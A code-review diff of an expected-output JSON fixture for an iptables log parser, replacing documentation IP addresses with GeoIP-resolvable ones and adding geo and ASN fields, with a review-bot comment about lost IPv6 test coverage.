TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:r9MnuXFtcWUKzbVQ2vXn7XSQ2Fg=", + "community_id": "1:iLlmyB6bkLDZ2y5VwrpHwVYUVC4=", "transport": "tcp" }, "observer": { 
@@ -473,14 +446,14 @@ }, "related": { "ip": [ - "198.51.100.198", + "192.168.100.198", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725474729Z", - "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195742Z", + "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" 
@@ -518,17 +491,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 59319, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.201" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:vgBSpDUKSSgxOm6Y52jw6tCgiN8=", + "community_id": "1:AXBuHRBBqw1ziE87Jkt8chnn/Hg=", "transport": "tcp" }, "observer": { 
@@ -540,14 +531,14 @@ }, "related": { "ip": [ - "203.0.113.201", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725477361Z", - "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195748100Z", + "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" 
@@ -585,17 +576,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 44181, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.246" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:PCNGbo6CtVQoE5Hch+6oMfbeTP4=", + "community_id": "1:i7/1jLJuoVUL8/PcL9r5bpJsKg0=", "transport": "tcp" }, "observer": { 
@@ -607,14 +616,14 @@ }, "related": { "ip": [ - "203.0.113.246", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725480004Z", - "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195753500Z", + "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" 
@@ -652,17 +661,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 64358, "mac": "90:10:76:e0:e2:d5", - "ip": "203.0.113.208" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:Wb/3DTwtWE8C20/hm2JpmBAhsro=", + "community_id": "1:xVgSZUAhVYBSzdOVqubsDgPK+04=", "transport": "tcp" }, "observer": { 
@@ -674,14 +701,14 @@ }, "related": { "ip": [ - "203.0.113.208", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725482632Z", - "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195757900Z", + "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -718,15 +745,15 @@ "source": { "port": 58830, "mac": "90:10:9e:ec:2c:71", - "ip": "198.51.100.160" + "ip": "192.168.100.160" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:+s7vkEgPnzTAoksA2Q0gAzgymfI=", + "community_id": "1:ZBKV474dyZ6IgnaMGTIwDQKBrHI=", "transport": "tcp" }, "observer": { 
@@ -738,14 +765,14 @@ }, "related": { "ip": [ - "198.51.100.160", + "192.168.100.160", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725485256Z", - "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195762900Z", + "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -785,15 +812,15 @@ "source": { "port": 51985, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.115" + "ip": "192.168.100.115" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6Pvyzf2+vqgsRxWx+eU9MXEhAFE=", + "community_id": "1:QpP5hsl26lIkI0SXiXDwdHu8wHc=", "transport": "tcp" }, "observer": { 
@@ -805,14 +832,14 @@ }, "related": { "ip": [ - "198.51.100.115", + "192.168.100.115", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725487863Z", - "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195767800Z", + "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -852,15 +879,15 @@ "source": { "port": 4099, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.167" + "ip": "192.168.100.167" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:g+bRFDuqViJEc5vzlOapz2LPhFo=", + "community_id": "1:7i2MLwBBY4Ew2vXQ9MEL+wtwDlA=", "transport": "tcp" }, "observer": { 
@@ -872,14 +899,14 @@ }, "related": { "ip": [ - "198.51.100.167", + "192.168.100.167", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725490673Z", - "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195772100Z", + "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -916,15 +943,15 @@ "source": { "port": 59287, "mac": "90:10:9e:ec:2c:71", - "ip": "198.51.100.19" + "ip": "192.168.100.19" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:a/4LVq88msR/LgVGzZeIkmlNXz4=", + "community_id": "1:4NmIL+7jDWJSegVPNW7Vf8u9up8=", "transport": "tcp" }, "observer": { 
@@ -936,14 +963,14 @@ }, "related": { "ip": [ - "198.51.100.19", + "192.168.100.19", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725493307Z", - "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195776600Z", + "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -980,15 +1007,15 @@ "source": { "port": 53296, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.68" + "ip": "192.168.100.68" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:1l65fWlqrJCJB7vBaqSgHnJoMbQ=", + "community_id": "1:JbpQRbHXlqHOyN6ZXFlgvG/jABc=", "transport": "tcp" }, "observer": { 
@@ -1000,14 +1027,14 @@ }, "related": { "ip": [ - "198.51.100.68", + "192.168.100.68", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725495946Z", - "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195781600Z", + "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" 
@@ -1034,17 +1061,47 @@ "ttl": 64 }, "destination": { - "ip": "2001:0db8:0000:0000:0000:0000:0000:0002" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "ip": "2001:0db8:0000:0000:0000:0000:0000:0001" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, - "message": "ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", + "message": "ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:u2vMS3HiWth2lIMKHB1fjELshpQ=", + "community_id": "1:l70dMD5f7kI8bfdEgFoDbb7DocE=", "transport": "ipv6-icmp" }, "observer": { 
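Review bot: The IPv6 loopback event now carries the same address, 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, as both `source.ip` and `destination.ip` (and as SRC/DST in `message`), where the original used two distinct 2001:db8:: addresses; as a result `related.ip` in the next hunk (L8384) shrinks from two entries to one, and the duplicated `geo`/`as` blocks assert nothing a single-address event would not. The fixture thus stops covering the distinct-endpoint case for IPv6 — the only IPv6 flow in this file — and `community_id` is now computed over a degenerate flow. If the supported set contains a second resolvable IPv6 address, using it for DST (`<SECOND_SUPPORTED_IPV6>` as a placeholder until one is chosen) would restore the two-entry `related.ip` check; otherwise confirm that losing it is acceptable.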
@@ -1056,13 +1113,12 @@ }, "related": { "ip": [ - "2001:0db8:0000:0000:0000:0000:0000:0001", - "2001:0db8:0000:0000:0000:0000:0000:0002" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-15T20:04:36.725498569Z", - "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", + "ingested": "2021-12-09T13:39:42.195787800Z", + "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "category": [ "network" ], @@ -1117,7 +1173,7 @@ ] }, "event": { - "ingested": "2021-06-15T20:04:36.725501185Z", + "ingested": "2021-12-09T13:39:42.195793700Z", "original": "Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4", "category": [ "network" @@ -1147,9 +1203,27 @@ "ttl": 64 }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 48689, "mac": "90:10:92:6e:ea:a7", - "ip": "255.55.174.225" + "ip": "81.2.69.143" }, "rule": { "name": "LAN_LOCAL", 
@@ -1160,13 +1234,13 @@ "mac": "90:10:73:ba:d6:77", "ip": "192.168.48.137" }, - "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", + "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:3qoibVBmc9hsnHpP4Ms5HO6ls7Q=", + "community_id": "1:X0/C+OHn+Y6LtFV5zGJkFDVT7/M=", "transport": "udp" }, "observer": { @@ -1179,13 +1253,13 @@ "related": { "ip": [ "192.168.48.137", - "255.55.174.225" + "81.2.69.143" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725510393Z", - "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", + "ingested": "2021-12-09T13:39:42.195800900Z", + "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "type": [ "allowed", "connection" @@ -1225,7 +1299,7 @@ "destination": { "port": 443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", 
@@ -1236,13 +1310,13 @@ "mac": "90:10:24:67:f4:89", "ip": "192.168.134.158" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:7bPQdYPL4yePwQJZt0I1dvVXLHc=", + "community_id": "1:BdmTg+UWl4/8/mdbYIG/bhkVfJQ=", "transport": "tcp" }, "observer": { @@ -1255,13 +1329,13 @@ "related": { "ip": [ "192.168.134.158", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725513330Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", + "ingested": "2021-12-09T13:39:42.195805200Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "type": [ "allowed", "connection" @@ -1302,7 +1376,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "source-dest", 
